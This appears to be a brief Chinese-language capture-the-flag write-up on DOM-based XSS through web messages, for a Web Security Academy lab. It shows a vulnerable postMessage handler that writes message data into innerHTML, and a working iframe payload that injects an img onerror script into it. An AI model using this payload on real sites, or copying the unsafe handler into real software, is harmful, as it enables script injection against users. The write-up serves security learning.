CTF-WEB: 利用Web消息造成DOM XSS
如果索引中有类似如下代码
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
});
</script>
- 这行代码的作用是将接收到的消息内容(
e.data
)设置为id
为'ads'
的元素的 HTML 内容
那么在受害者段执行如下代码会导致DOM污染
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
参考
实验:使用 Web 消息的 DOM XSS |网络安全学院